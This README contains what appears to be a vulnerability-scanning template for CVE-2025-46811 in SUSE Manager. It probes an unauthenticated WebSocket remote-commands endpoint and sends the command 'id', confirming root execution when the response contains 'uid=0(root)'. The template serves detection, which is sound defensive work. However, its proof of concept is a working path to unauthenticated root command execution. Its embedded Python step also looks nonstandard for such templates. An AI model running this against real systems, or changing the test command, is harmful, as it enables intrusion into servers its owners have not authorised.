README.md
Rendering markdown...
id: CVE-2025-46811-suse-manager-rce
info:
name: SUSE Manager Unauthenticated RCE via WebSocket
author: yourusername
severity: critical
description: |
Missing authentication in SUSE Manager allows unauthenticated remote code execution
via the /rhn/websocket/minion/remote-commands endpoint
reference:
- https://www.suse.com/security/cve/CVE-2025-46811/
tags: rce,suse,manager,websocket,unauth
http:
- method: GET
path:
- "{{BaseURL}}/rhn/websocket/minion/remote-commands"
headers:
Upgrade: websocket
Connection: Upgrade
Origin: {{BaseURL}}
matchers:
- type: word
part: header
words:
- "101 Switching Protocols"
condition: and
- type: regex
part: header
regex:
- "Sec-WebSocket-Accept:"
extractors:
- type: regex
name: websocket_endpoint
regex: '(wss?://[^\s]+/rhn/websocket/minion/remote-commands)'
- method: GET
path:
- "{{BaseURL}}/rhn/manager/api"
matchers:
- type: word
words:
- "SUSE Manager"
- "API"
condition: and
- type: status
status:
- 200
rce:
description: Proof-of-concept command execution
payloads:
test_cmd: "id"
attack: websocket
steps:
- |
async with websockets.connect('{{websocket_endpoint}}', ssl=False) as ws:
await ws.send('{{test_cmd}}')
response = await ws.recv()
if "uid=0(root)" in response:
return True
matchers:
- type: word
words:
- "uid=0(root)"